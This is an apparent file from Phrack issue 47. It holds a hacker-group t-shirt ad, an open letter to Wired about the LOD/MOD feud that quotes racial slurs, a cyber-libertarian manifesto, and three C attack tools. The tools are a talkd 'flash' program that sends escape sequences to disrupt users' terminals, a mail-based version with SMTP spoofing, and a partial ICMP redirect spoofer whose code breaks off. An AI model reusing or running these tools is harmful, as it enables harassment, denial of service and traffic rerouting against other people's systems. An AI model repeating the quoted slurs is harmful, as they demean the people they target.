| ==Phrack Magazine== | |
| Volume Six, Issue Forty-Seven, File 4 of 22 | |
| // // /\ // ==== | |
| // // //\\ // ==== | |
| ==== // // \\/ ==== | |
| /\ // // \\ // /=== ==== | |
| //\\ // // // // \=\ ==== | |
| // \\/ \\ // // ===/ ==== | |
| PART II | |
| ------------------------------------------------------------------------------ | |
| The official Legion of Doom t-shirts are stll available!!! | |
| Join the net luminaries world-wide in owning one of these amazing | |
| shirts. Impress members of the opposite sex, increase your IQ, | |
| annoy system administrators, get raided by the government and | |
| lose your wardrobe! | |
| Can a t-shirt really do all this? Of course it can! | |
| -------------------------------------------------------------------------- | |
| "THE HACKER WAR -- LOD vs MOD" | |
| This t-shirt chronicles the infamous "Hacker War" between rival | |
| groups The Legion of Doom and The Masters of Destruction. The front | |
| of the shirt displays a flight map of the various battle-sites | |
| hit by MOD and tracked by LOD. The back of the shirt | |
| has a detailed timeline of the key dates in the conflict, and | |
| a rather ironic quote from an MOD member. | |
| (For a limited time, the original is back!) | |
| "LEGION OF DOOM -- INTERNET WORLD TOUR" | |
| The front of this classic shirt displays "Legion of Doom Internet World | |
| Tour" as well as a sword and telephone intersecting the planet | |
| earth, skull-and-crossbones style. The back displays the | |
| words "Hacking for Jesus" as well as a substantial list of "tour-stops" | |
| (internet sites) and a quote from Aleister Crowley. | |
| -------------------------------------------------------------------------- | |
| All t-shirts are sized XL, and are 100% cotton. | |
| Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for | |
| postage. | |
| Send checks or money orders. Please, no credit cards, even if | |
| it's really your card. | |
| Name: __________________________________________________ | |
| Address: __________________________________________________ | |
| City, State, Zip: __________________________________________ | |
| I want ____ "Hacker War" shirt(s) | |
| I want ____ "Internet World Tour" shirt(s) | |
| Enclosed is $______ for the total cost. | |
| Mail to: Chris Goggans | |
| 603 W. 13th #1A-278 | |
| Austin, TX 78701 | |
| These T-shirts are sold only as a novelty items, and are in no way | |
| attempting to glorify computer crime. | |
| ------------------------------------------------------------------------------ | |
| [The editor's Open Letter to Wired Magazine...they actually had the nerve | |
| to print it in their May issue. Amazing...or was it? The letter was posted | |
| to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well, | |
| sent in email to every user of wired.com, faxed to all 7 fax machines at | |
| Wired and sent to them registered mail. Probably more than 5 times | |
| Wired's paid circulation saw it, so they HAD to print it or look foolish. | |
| At least, that's my take on it. Just for overkill, here it is again.] | |
| To Whom It May Concern: | |
| I am writing this under the assumption that the editorial staff at | |
| Wired will "forget" to print it in the upcoming issue, so I am | |
| also posting it on every relevant newsgroup and online discussion forum | |
| that I can think of. | |
| When I first read your piece "Gang War In Cyberspace" I nearly choked on | |
| my own stomach bile. The whole tone of this piece was so far removed from | |
| reality that I found myself questioning what color the sky must be | |
| in Wired's universe. Not that I've come to expect any better from Wired. | |
| Your magazine, which could have had the potential to actually do something, | |
| has become a parody...a politically correct art-school project that | |
| consistently falls short of telling the whole story or making a solid point. | |
| (Just another example of Kapor-Kash that ends up letting everyone down.) | |
| I did however expect more from Josh Quittner. | |
| I find it interesting that so much emphasis can be placed on an issue of | |
| supposed racial slurs as the focus of an imaginary "gang war," especially | |
| so many years after the fact. | |
| It's also interesting to me that people keep overlooking the fact that one of | |
| the first few members of our own little Legion of Doom was black (Paul | |
| Muad'dib.) Maybe if he had not died a few years back that wouldn't be | |
| so quickly forgotten. (Not that it makes a BIT of difference what color | |
| a hacker is as long as he or she has a brain and a modem, or these days | |
| at least a modem.) | |
| I also find it interesting that a magazine can so easily implicate someone | |
| as the originator of the so-called "fighting words" that allegedly sparked | |
| this online-battle, without even giving a second thought as to the damage | |
| that this may do to the person so named. One would think that a magazine | |
| would have more journalistic integrity than that (but then again, this IS | |
| Wired, and political correctness sells magazines and satisfies advertisers.) | |
| Thankfully, I'll only have to endure one month of the "Gee Chris, did you | |
| know you were a racist redneck?" phone calls. | |
| It's further odd that someone characterized as so sensitive to insults | |
| allegedly uttered on a party-line could have kept the company he did. | |
| Strangely enough, Quittner left out all mention of the MOD member who called | |
| himself "SuperNigger." Surely, John Lee must have taken umbrage to an | |
| upper-middle class man of Hebrew descent so shamefully mocking him and | |
| his entire race, wouldn't he? Certainly he wouldn't associate in any way | |
| with someone like that...especially be in the same group with, hang out with, | |
| and work on hacking projects with, would he? | |
| Please, of course he would, and he did. (And perhaps he still does...) | |
| The whole "racial issue" was a NON-ISSUE. However, such things make | |
| exciting copy and garner many column inches so keep being rehashed. In | |
| fact, several years back when the issue first came up, the statement was | |
| cited as being either "Hang up, you nigger," or "Hey, SuperNigger," but | |
| no one was sure which was actually said. Funny how the wording changes | |
| to fit the slant of the "journalist" over time, isn't it? | |
| I wish I could say for certain which was actually spoken, but alas, I was not | |
| privy to such things. Despite the hobby I supposedly so enjoyed according | |
| to Quittner, "doing conference bridges," I abhorred the things. We used to | |
| refer to them as "Multi-Loser Youps" (multi-user loops) and called their | |
| denizens "Bridge Bunnies." The bridge referred to in the story was | |
| popularized by the callers of the 5A BBS in Houston, Texas. (A bulletin board, | |
| that I never even got the chance to call, as I had recently been raided by | |
| the Secret Service and had no computer.) Many people from Texas did call | |
| the BBS, however, and subsequently used the bridge, but so did people from | |
| Florida, Arizona, Michigan, New York and Louisiana. And as numbers do in the | |
| underground, word of a new place to hang out caused it to propagate rapidly. | |
| To make any implications that such things were strictly a New York versus Texas | |
| issue is ludicrous, and again simply goes to show that a "journalist" was | |
| looking for more points to add to his (or her) particular angle. | |
| This is not to say that I did not have problems with any of the people | |
| who were in MOD. At the time I still harbored strong feelings towards | |
| Phiber Optik for the NYNEX-Infopath swindle, but that was about it. | |
| And that was YEARS ago. (Even I don't harbor a grudge that long.) | |
| Even the dozen or so annoying phone calls I received in late 1990 and | |
| early 1991 did little to evoke "a declaration of war." Like many people, | |
| I know how to forward my calls, or unplug the phone. Amazing how technology | |
| works, isn't it? | |
| Those prank calls also had about as much to do with the formation of Comsec as | |
| bubble-gum had to do with the discovery of nuclear fission. (I'm sure if you | |
| really put some brain power to it, and consulted Robert Anton Wilson, | |
| you could find some relationships.) At the risk of sounding glib, we | |
| could have cared less about hackers at Comsec. If there were no hackers, | |
| or computer criminals, there would be no need for computer security | |
| consultants. Besides, hackers account for so little in the real picture | |
| of computer crime, that their existence is more annoyance than something | |
| to actually fear. | |
| However, when those same hackers crossed the line and began tapping our | |
| phone lines, we were more than glad to go after them. This is one of my only | |
| rules of action: do whatever you want to anyone else, but mess with me and | |
| my livelihood and I will devote every ounce of my being to paying you back. | |
| That is exactly what we did. | |
| This is not to say that we were the only people from the computer underground | |
| who went to various law enforcement agencies with information about | |
| MOD and their antics. In fact, the number of hackers who did was staggering, | |
| especially when you consider the usual anarchy of the underground. None of | |
| these other people ever get mentioned and those of us at Comsec always take | |
| the lead role as the "narks," but we were far from alone. MOD managed to | |
| alienate the vast majority of the computer underground, and people reacted. | |
| All in all, both in this piece, and in the book itself, "MOD, The Gang That | |
| Ruled Cyberspace," Quittner has managed to paint a far too apologetic piece | |
| about a group of people who cared so very little about the networks they | |
| played in and the people who live there. In the last 15 years that I've | |
| been skulking around online, people in the community have always tended | |
| to treat each other and the computers systems they voyeured with a great deal | |
| of care and respect. MOD was one of the first true examples of a groupthink | |
| exercise in hacker sociopathy. Selling long distance codes, selling credit | |
| card numbers, destroying systems and harassing innocent people is not | |
| acceptable behavior among ANY group, even the computer underground. | |
| There have always been ego flares and group rivalries in the underground, and | |
| there always will be. The Legion of Doom itself was FOUNDED because of a | |
| spat between its founder (Lex Luthor) and members of a group called The Knights | |
| of Shadow. These rivalries keep things interesting, and keep the community | |
| moving forward, always seeking the newest bit of information in a series | |
| of healthy one-upsmanship. MOD was different. They took things too far | |
| against everyone, not just against two people in Texas. | |
| I certainly don't condemn everyone in the group. I don't even know | |
| a number of them (electronically or otherwise.) I honestly believe | |
| that Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed while | |
| the group's two biggest criminals, Julio Fernandez (Outlaw) and Allen Wilson | |
| (Wing), rolled over on everyone else and walked away free and clear. This is | |
| repulsive when you find out that Wing in particular has gone on to be | |
| implicated in more damage to the Internet (as Posse and ILF) than anyone in | |
| the history of the computing. This I find truly disgusting, and hope that | |
| the Secret Service are proud of themselves. | |
| Imagine if I wrote a piece about the terrible treatment of a poor prisoner | |
| in Wisconsin who was bludgeoned to death by other inmates while guards | |
| looked away. Imagine if I tried to explain the fact that poor Jeff Dahmer was | |
| provoked to murder and cannibalism by the mocking of adolescent boys who teased | |
| and called him a faggot. How would you feel if I tried to convince you that we | |
| should look upon him with pity and think of him as a misunderstood political | |
| prisoner? You would probably feel about how I do about Quittner's story. | |
| 'Hacker' can just as easily be applied to "journalists" too, and with this | |
| piece Quittner has joined the Hack Journalist Hall of Fame, taking his | |
| place right next to Richard Sandza. | |
| Quittner did get a few things right. I do have a big cat named Spud, I do | |
| work at a computer company and I do sell fantastic t-shirts. Buy some. | |
| With Love, | |
| Chris Goggans | |
| aka Erik Bloodaxe | |
| phrack@well.com | |
| ------------------------------------------------------------------------------ | |
| From: DigitaLiberty@phantom.com | |
| Subject: Announcing - The DigitaLiberty Forum | |
| PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT | |
| Friends of Liberty, | |
| It is becoming increasingly apparent that the arrival of cyberspace is | |
| destined to engender a fundamental discontinuity in the course of human | |
| relations. This is a source of great optimism and opportunity for those of | |
| us who believe in freedom. | |
| Many of you who participate in the lively debates that take place in these | |
| forums have seen a number of activist organizations spring up claiming to | |
| represent the cause of freedom. And if you are like me you have cheered | |
| these groups on only to watch them get bogged down in a quagmire of | |
| realpolitics. | |
| It is a sad fact that the beast in Washington has evolved into a | |
| self-perpetuating engine expert at co-opting the principles of even the most | |
| ardent reformers. Slowly but surely all those who engage the system are | |
| ultimately absorbed into the mainstream miasma of majoritarianism. For | |
| example, what can be more discouraging than watching an organization that | |
| started out as a civil liberties group shift its focus to creating new forms | |
| of government entitlements while endorsing intrusive wiretap legislation | |
| because they didn't want to jeopardize their influence and prestige amongst | |
| the Washington power elite? | |
| Some of us believe we can seek ultimate redress at the polls. Many pundits | |
| have declared our recent national elections a watershed in politics, a | |
| turning point that represents the high water mark of big government. | |
| Nonsense. The names have changed, the chairs have been rearranged, but the | |
| game remains the same. The so-called "choices" we are presented with are | |
| false, hardly better than the mock one-party elections held by failed | |
| totalitarian regimes. There must be a better way. | |
| I would like to announce the formation of a new group - DigitaLiberty - that | |
| has chosen a different path. We intend to bypass the existing political | |
| process. We reject consensus building based on the calculus of compromise. | |
| Instead we plan to leave the past behind, much as our pioneering forefathers | |
| did when they set out to settle new lands. It is our mission to create the | |
| basis for a different kind of society. If you would like to join us I invite | |
| you to read the information below. | |
| Yours in freedom, | |
| Bill Frezza | |
| Co-founder, DigitaLiberty | |
| December 1994 | |
| *** What is DigitaLiberty? | |
| DigitaLiberty is an advocacy group dedicated to the principled defense of | |
| freedom in cyberspace. We intend to conduct this defense not by engaging in | |
| traditional power politics but by setting an active, persuasive example - | |
| creating tangible opportunities for others to join us as we construct new | |
| global communities. | |
| We believe deeply in free markets and free minds and are convinced that we | |
| can construct a domain in which the uncoerced choices of individuals supplant | |
| the social compact politics of the tyranny of the majority. | |
| *** Is DigitaLiberty a political party or a lobbying group? | |
| Neither. | |
| DigitaLiberty does not seek to educate or influence politicians in the hope | |
| of obtaining legislation favorable to our constituents. We plan to make | |
| politicians and legislators irrelevant to the future of network based | |
| commerce, education, leisure, and social intercourse. | |
| DigitaLiberty does not seek to persuade a majority of the electorate to adopt | |
| views which can then be forced upon the minority. We hope to make | |
| majoritarianism irrelevant. We invite only like minded individuals to help | |
| us build the future according to our uncompromised shared values. | |
| *** What do you hope to accomplish? | |
| DigitaLiberty is not hopeful that widespread freedom will come to the | |
| physical world, at least not in our lifetime. Too many constituencies depend | |
| upon the largess and redistributive power of national governments and | |
| therefore oppose freedom and the individual responsibility it entails. But | |
| we do believe that liberty can and will prevail in the virtual domains we are | |
| building on the net and that national governments will be powerless to stop | |
| us. We believe that cyberspace will transcend national borders, national | |
| cultures, and national economies. We believe that no one will hold | |
| sovereignty over this new realm because coercive force is impotent in | |
| cyberspace. | |
| In keeping with the self-organizing nature of on-line societies we believe we | |
| will chose to invent new institutions to serve our varied economic and social | |
| purposes. DigitaLiberty intends to be in the forefront of the discovery and | |
| construction of these institutions. | |
| *** But what about the construction of the "Information Superhighway"? | |
| The fabric of cyberspace is rapidly being built by all manner of entities | |
| espousing the full range of political and economic philosophies. While | |
| political activity can certainly accelerate or retard the growth of the net | |
| in various places and times it cannot stop it nor can it effectively control | |
| how the net will be used. | |
| Our focus is not on the institutions that can and will impact the building of | |
| the physical "information highway" but on those that will shape life on the | |
| net as an ever increasing portion of our productive activities move there. | |
| *** What makes you think cyberspace will be so different? | |
| The United States of America was the only country in history ever to be built | |
| upon an idea. Unfortunately, this idea was lost as we slowly traded away our | |
| liberties in exchange for the false promise of security. | |
| DigitaLiberty believes that technology can set us free. The economies of the | |
| developed world are now making a major transition from an industrial base to | |
| an information base. As they do, the science of cryptology will finally and | |
| forever guarantee the unbreachable right of privacy, protecting individuals, | |
| groups, and corporations from the prying eyes and grasping hands of | |
| sovereigns. We will all be free to conduct our lives, and most importantly | |
| our economic relations, as we each see fit. | |
| Cyberspace is also infinitely extensible. There will be no brutal | |
| competition for lebensraum. Multiple virtual communities can exist side by | |
| side and without destructive conflict, each organized according to the | |
| principles of their members. We seek only to build one such community, a | |
| community based on individual liberty. Others are free to build communities | |
| based on other principles, even diametrically opposed principles. But they | |
| must do so without our coerced assistance. | |
| Effective communities will thrive and grow. Dysfunctional communities will | |
| wither and die. And for the first time in human history, rapacious societies | |
| will no longer have the power to make war on their neighbors nor can bankrupt | |
| communities take their neighbors down with them. | |
| *** What does this have to do with my real life? I can't eat data. I don't | |
| live in a computer. | |
| Yes, but imagine the ultimate impact of mankind's transition from an agrarian | |
| economy to an industrial economy to an information economy. Our founding | |
| fathers would have consider anyone insane who predicted that a nation of 250 | |
| million could feed itself with fewer than 3% of its citizens involved in | |
| agriculture. Similarly, economists and politicians trapped in the policies | |
| of the past lament our move from a manufacturing economy to a knowledge | |
| worker and service based economy. We see this as a cause to rejoice. | |
| The day will come when fewer than 5% of the citizens of a nation of 1 billion | |
| will be involved in manufacturing - if we still bother calling geographically | |
| defined entities "nations". What will the rest of us be doing? We will be | |
| providing each other with an exploding array of services and we will be | |
| creating, consuming, and exchanging information. Most of this will occur | |
| entirely within or be mediated at least in part by our activities in | |
| cyberspace. | |
| Many of us will earn a very good living on the net. Our race, our religion, | |
| our gender, our age, our physical appearance and limitations will all be | |
| irrelevant and undetectable. Hard working individuals from underdeveloped | |
| nations who in the past might have been forced to emigrate in search of | |
| economic freedom and opportunity can now build productive lives in | |
| cyberspace. And much if not all of the wealth we create that we do not | |
| transform into visible physical assets will be ours to keep and use, beyond | |
| the grasp of sovereigns. | |
| *** What is the purpose of this forum? | |
| The DigitaLiberty Forum is a place where like minded individuals can share | |
| their views, observations, and strategies related to the development of | |
| virtual communities based on freedom. It is a place where people can | |
| exchange information and advice about how they have developed | |
| extra-territorial business and social relationships - away from the | |
| influence and outside the jurisdiction of governments. It is a forum for the | |
| posting of essays, questions, and ideas on the topic of liberty. It is a | |
| place where we can meet and debate the forms that our new institutions might | |
| take and discuss the practical problems and responsibilities that freedom | |
| entail. | |
| In time as our technology matures some of us will move on to more ambitious | |
| projects, launch other programs, and begin our virtual migration from the | |
| swamp of coerced collectivism. Best of all, there will be no need to | |
| physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We | |
| can all participate in this exodus without hastily quitting our jobs or | |
| disrupting our lives. And as a larger and larger portion of our economic and | |
| social activities move onto the net we will create a new society, open to all | |
| with the will to enter. This new world will be interleaved with the physical | |
| world in which we now live and yet will be separate. And free. | |
| Join us as we begin the journey. | |
| *** Who can join DigitaLiberty? | |
| The DigitaLiberty Forum is open to anyone that can honestly answer yes to the | |
| following two questions: | |
| 1) I renounce the use of coercive force as a tool of social or economic | |
| policy. | |
| 2) I do not derive the majority of my income from funds taken from | |
| taxpayers. | |
| *** How do I join DigitaLiberty? | |
| If you qualify, send a message to DigitaLiberty-request@phantom.com with the | |
| words "SUBSCRIBE" in the subject line and the message body as follows | |
| SUBSCRIBE DigitaLiberty <your name> | |
| And welcome to the future. | |
| ### | |
| ------------------------------------------------------------------------------ | |
| /* flash3.c */ | |
| /* | |
| Modified from the original by Vassago. Superflash mods unknown. | |
| Try the PhoEniX FTP Site: wentz21.reslife.okstate.edu in /pub. | |
| */ | |
| /* | |
| This little program is intended to quickly mess up a user's | |
| terminal by issuing a talk request to that person and sending | |
| vt100 escape characters that force the user to logout or kill | |
| his/her xterm in order to regain a sane view of the text. | |
| It the user's message mode is set to off (mesg n) he/she will | |
| be unharmed. | |
| Try compiling with: gcc -o flash flash3.c | |
| Usage: flash user@host [<level>] | |
| Level is either the number or the word for these: | |
| 1) BASIC - Old flash, no zmodem. | |
| 2) ZMODEM - Old with ZModem. | |
| 3) KILLER - 99 ZModem flashes. | |
| */ | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <netdb.h> | |
| #include <stdio.h> | |
| #include <strings.h> | |
| #include <string.h> | |
| #include <ctype.h> | |
| #define BASIC 1 | |
| #define ZMODEM 2 | |
| #define KILLER 3 | |
| #define FIRST "\033(0\033#8" | |
| #define SECOND "\033[1;3r" | |
| #define THIRD "\033[1;5m\033(0" | |
| #define FOURTH "**\030B00" | |
| #define FIFTH "\033**EMSI_IRQ8E08" | |
| /* Comment this to remove the debugging message... */ | |
| #define INFOMESSAGE | |
| /* this should really be in an include file.. */ | |
| #define OLD_NAME_SIZE 9 | |
| #define NAME_SIZE 12 | |
| #define TTY_SIZE 16 | |
| typedef struct { | |
| char type; | |
| char l_name[OLD_NAME_SIZE]; | |
| char r_name[OLD_NAME_SIZE]; | |
| char filler; | |
| u_long id_num; | |
| u_long pid; | |
| char r_tty[TTY_SIZE]; | |
| struct sockaddr_in addr; | |
| struct sockaddr_in ctl_addr; | |
| } OLD_MSG; | |
| typedef struct { | |
| u_char vers; | |
| char type; | |
| u_short filler; | |
| u_long id_num; | |
| struct sockaddr_in addr; | |
| struct sockaddr_in ctl_addr; | |
| long pid; | |
| char l_name[NAME_SIZE]; | |
| char r_name[NAME_SIZE]; | |
| char r_tty[TTY_SIZE]; | |
| } CTL_MSG; | |
| int seed = 0x2837; | |
| #define TALK_VERSION 1 /* protocol version */ | |
| /* Types */ | |
| #define LEAVE_INVITE 0 | |
| #define LOOK_UP 1 | |
| #define DELETE 2 | |
| #define ANNOUNCE 3 | |
| int current = 1; /* current id.. this to avoid duplications */ | |
| struct sockaddr_in *getinaddr(char *hostname, u_short port) | |
| { | |
| static struct sockaddr addr; | |
| struct sockaddr_in *address; | |
| struct hostent *host; | |
| address = (struct sockaddr_in *)&addr; | |
| (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); | |
| /* fill in the easy fields */ | |
| address->sin_family = AF_INET; | |
| address->sin_port = htons(port); | |
| /* first, check if the address is an ip address */ | |
| address->sin_addr.s_addr = inet_addr(hostname); | |
| if ( (int)address->sin_addr.s_addr == -1) | |
| { | |
| /* it wasn't.. so we try it as a long host name */ | |
| host = gethostbyname(hostname); | |
| if (host) | |
| { | |
| /* wow. It's a host name.. set the fields */ | |
| /* ?? address->sin_family = host->h_addrtype; */ | |
| bcopy( host->h_addr, (char *)&address->sin_addr, | |
| host->h_length); | |
| } | |
| else | |
| { | |
| /* oops.. can't find it.. */ | |
| puts("Flash aborted, could not find address."); | |
| exit(-1); | |
| return (struct sockaddr_in *)0; | |
| } | |
| } | |
| /* all done. */ | |
| return (struct sockaddr_in *)address; | |
| } | |
| SendTalkPacket(struct sockaddr_in *target, char *p, int psize) | |
| { | |
| int s; | |
| struct sockaddr sample; /* not used.. only to get the size */ | |
| s = socket(AF_INET, SOCK_DGRAM, 0); | |
| sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); | |
| } | |
| new_ANNOUNCE(char *hostname, char *remote, char *local) | |
| { | |
| CTL_MSG packet; | |
| struct sockaddr_in *address; | |
| /* create a packet */ | |
| address = getinaddr(hostname, 666 ); | |
| address->sin_family = htons(AF_INET); | |
| bzero( (char *)&packet, sizeof(packet) ); | |
| packet.vers = TALK_VERSION; | |
| packet.type = ANNOUNCE; | |
| packet.pid = getpid(); | |
| packet.id_num = current; | |
| bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); | |
| bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); | |
| strncpy( packet.l_name, local, NAME_SIZE); | |
| strncpy( packet.r_name, remote, NAME_SIZE); | |
| strncpy( packet.r_tty, "", 1); | |
| SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); | |
| } | |
| old_ANNOUNCE(char *hostname, char *remote, char *local) | |
| { | |
| OLD_MSG packet; | |
| struct sockaddr_in *address; | |
| /* create a packet */ | |
| address = getinaddr(hostname, 666 ); | |
| address->sin_family = htons(AF_INET); | |
| bzero( (char *)&packet, sizeof(packet) ); | |
| packet.type = ANNOUNCE; | |
| packet.pid = getpid(); | |
| packet.id_num = current; | |
| bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); | |
| bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); | |
| strncpy( packet.l_name, local, NAME_SIZE); | |
| strncpy( packet.r_name, remote, NAME_SIZE); | |
| strncpy( packet.r_tty, "", 1); | |
| SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); | |
| } | |
| int rnd() | |
| { | |
| seed *=0x1243; | |
| seed = seed & 0xFFFF; | |
| seed +=1; | |
| while(seed>10000)seed-=10000; | |
| return(seed); | |
| } | |
| pop(char *hostname, char *username, char *flashstring) | |
| { | |
| char newflashstr[80]; | |
| int e = rnd(); | |
| sprintf(newflashstr,"%d%s",e,flashstring); | |
| new_ANNOUNCE(hostname, username, newflashstr); | |
| old_ANNOUNCE(hostname, username, newflashstr); | |
| } | |
| flash(int type, char *hostname, char *username) | |
| { | |
| char firestring[10]; | |
| int x,y; | |
| current=0; | |
| if (type == 3) y = 14; | |
| else y = 1; | |
| for(x=0;x<y;x++) | |
| { | |
| current++; | |
| pop(hostname, username, FIRST); | |
| current++; | |
| pop(hostname, username, SECOND); | |
| current++; | |
| pop(hostname, username, THIRD); | |
| if(type>1) | |
| { | |
| current++; | |
| pop(hostname, username, FOURTH); | |
| current++; | |
| pop(hostname, username, FIFTH); | |
| current++; | |
| pop(hostname, username, FOURTH); | |
| } | |
| current++; | |
| pop(hostname, username, FIRST); | |
| } | |
| return(current); | |
| } | |
| GetType(char *TypeStr) | |
| { | |
| if (strcmp(TypeStr,"basic")==0) | |
| return(1); | |
| else if (strcmp(TypeStr,"zmodem")==0) | |
| return(2); | |
| else if (strcmp(TypeStr,"killer")==0) | |
| return(3); | |
| else if (strcmp(TypeStr,"1")==0) | |
| return(1); | |
| else if (strcmp(TypeStr,"2")==0) | |
| return(2); | |
| else if (strcmp(TypeStr,"3")==0) | |
| return(3); | |
| } | |
| main(int argc, char *argv[]) | |
| { | |
| char *hostname, *username; | |
| int pid,type,name; | |
| if ( (pid = fork()) == -1) | |
| { | |
| perror("fork()"); | |
| exit(-1); | |
| } | |
| if ( !pid ) | |
| { | |
| exit(0); | |
| } | |
| if (argc < 2) { | |
| puts("USAGE: flash user@host [<flash type>]"); | |
| puts("Types are: 1) basic, 2) zmodem, 3) killer."); | |
| puts("Default flash type is zmodem."); | |
| exit(5); | |
| } | |
| if (argc >= 3) { | |
| type=GetType(argv[argc-1]); | |
| if(type<1||type>3)type=ZMODEM; | |
| } | |
| else type=ZMODEM; /* default */ | |
| for(name=1; name<argc-1; name++) | |
| { | |
| username = argv[name]; | |
| if ( (hostname = (char *)strchr(username, '@')) == NULL ) | |
| { | |
| puts("Aborted, invalid name. "); | |
| exit(-1); | |
| } | |
| *hostname = '\0'; | |
| hostname++; | |
| if (*username == '~') | |
| username++; | |
| #ifdef INFOMESSAGE | |
| printf("Sending a type #%d flash to %s@%s. (%d messages)\n", | |
| type,username,hostname, | |
| flash(type,hostname,username)); | |
| #else | |
| flash(type,hostname,username); | |
| #endif | |
| sleep(1); | |
| } | |
| } | |
| ------------------------------------------------------------------------------ | |
| /* | |
| Mail Flash - (C) 1994 CHA0S All Rights Reserved | |
| This is a simple program which demonstrates the problem with certain | |
| parts of VT100 emulation. Previously similar programs made use | |
| of talkd, but a user could stop attempts by simply entering | |
| "mesg n". This program sends the "flash" string which will really | |
| screw over a terminal in the SUBJECT header of e-mail. E-Mail readers | |
| such as pine show you this before you can decide to even delete the mail! | |
| Support has been added to choose your own SMTP server for neat-o hostname | |
| spoofing. (krad!) | |
| */ | |
| #include <stdio.h> | |
| #include <sys/param.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <netdb.h> | |
| #include <stdarg.h> | |
| void smtp_connect(char *server); | |
| int thesock; /* the socket */ | |
| void smtp_connect(char *server) | |
| { | |
| struct sockaddr_in sin; | |
| struct hostent *hp; | |
| hp = gethostbyname(server); | |
| if (hp==NULL) { | |
| printf("Unknown host: %s\n",server); | |
| exit(0); | |
| } | |
| bzero((char*) &sin, sizeof(sin)); | |
| bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); | |
| sin.sin_family = hp->h_addrtype; | |
| sin.sin_port = htons(25); | |
| thesock = socket(AF_INET, SOCK_STREAM, 0); | |
| connect(thesock,(struct sockaddr *) &sin, sizeof(sin)); | |
| } | |
| void main(int argc, char **argv) | |
| { | |
| char buf[1024]; | |
| if (argc != 4) { | |
| printf("usage: mflash smtp_server from to\n"); | |
| exit(0); | |
| } | |
| printf("Connecting to SMTP Server %s\n",argv[1]); | |
| smtp_connect(argv[1]); | |
| printf("Sending Mail Flash To %s\n",argv[3]); | |
| sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]); | |
| send(thesock, buf, strlen(buf), 0); | |
| /* I am not sure how to check when this buffer is done being sent. | |
| If you are having any problems increase the sleep time below! */ | |
| printf("Sleeping To Make Sure Data Is Sent ...\n"); | |
| sleep(3); | |
| printf("Done!\n"); | |
| } | |
| ------------------------------------------------------------------------------ | |
| [Editor's Note: Does this work? I don't think so, but a clever hacker might | |
| use the code to do something "interesting." The concept is sound...the | |
| delivery needs a bit of tweaking.] | |
| #include <netdb.h> | |
| #include <sys/time.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <netinet/in_systm.h> | |
| #include <netinet/ip.h> | |
| #include <netinet/ip_icmp.h> | |
| #include <netinet/tcp.h> | |
| #include <signal.h> | |
| #include <errno.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| int | |
| resolver(host,saddr) | |
| char *host; | |
| struct sockaddr_in *saddr; | |
| { | |
| struct hostent *h=gethostbyname(host); | |
| bzero(saddr,sizeof(struct sockaddr)); | |
| saddr->sin_family=AF_INET; | |
| if (h!=NULL) | |
| { | |
| saddr->sin_family=h->h_addrtype; | |
| bcopy(h->h_addr,(caddr_t)&saddr->sin_addr,h->h_length); | |
| return(0); | |
| } | |
| else | |
| { | |
| fprintf(stderr,"juju-router: unknown host ``%s''\n",host); | |
| return(-1); | |
| } | |
| return(0); | |
| } | |
| in_cksum(addr,len) | |
| u_short *addr; | |
| int len; | |
| { | |
| register int nleft = len; | |
| register u_short *w = addr; | |
| register int sum = 0; | |
| u_short answer = 0; | |
| /* This function was taking from existing ICMP nuke code and | |
| was presumably originally stripped from a ``ping.c'' implementation. | |
| */ | |
| while( nleft > 1 ) | |
| { | |
| sum+=*w++; | |
| nleft-=2l; | |
| } | |
| if( nleft == 1 ) | |
| { | |
| *(u_char *)(&answer) = *(u_char *)w; | |
| sum+=answer; | |
| } | |
| sum=(sum>>16)+(sum& 0xffff); | |
| sum+=(sum>>16); | |
| answer=~sum; | |
| return(answer); | |
| } | |
| int | |
| icmp_reroute(host,uhost,port,code) | |
| char *host, *uhost; | |
| int code, port; | |
| { | |
| struct sockaddr_in name; | |
| struct sockaddr dest, uspoof; | |
| struct icmp *mp; | |
| struct tcphdr *tp; | |
| struct protoent *proto; | |
| int i, s, rc; | |
| char *buf=(char *) malloc(sizeof(struct icmp)+64); | |
| mp=(struct icmp *) buf; | |
| if (resolver(host,&dest)<0) return(-1); | |
| if (resolver(uhost,&uspoof)<0) return(-1); | |
| if ((proto=getprotobyname("icmp")==NULL)) | |
| { | |
| fprintf(stderr,"fatal; unable to determine protocol number of ``icmp''\n"); | |
| return(-1); | |
| } | |
| if ((s=socket(AF_INET,SOCK_RAW,proto->p_proto))<0) | |
| { | |
| perror("opening raw socket"); | |
| return(-1); | |
| } | |
| name.sin_family=AF_INET; | |
| name.sin_addr.s_addr=INADDR_ANY; | |
| name.sin_port=htons(port); | |
| if ((rc=bind(s,(struct sockaddr *) &name, sizeof(name)))==-1) | |
| { | |
| fprintf(stderr,"fatal; error binding sockets\n"); | |
| return(-1); | |
| } | |
| if ((proto=getprotobyname("tcp")==NULL)) | |
| { | |
| fprintf(stderr,"fatal; unable to determine protocol number of ``tcp''\n"); | |
| return(-1); | |
| } | |
| bzero(mp,sizeof(struct icmp)+64); | |
| mp->icmp_type = ICMP_REDIRECT; | |
| mp->icmp_code = code; | |
| mp->icmp_ip.ip_v = IPVERSION; | |
| mp->icmp_ip.ip_hl = 5; | |
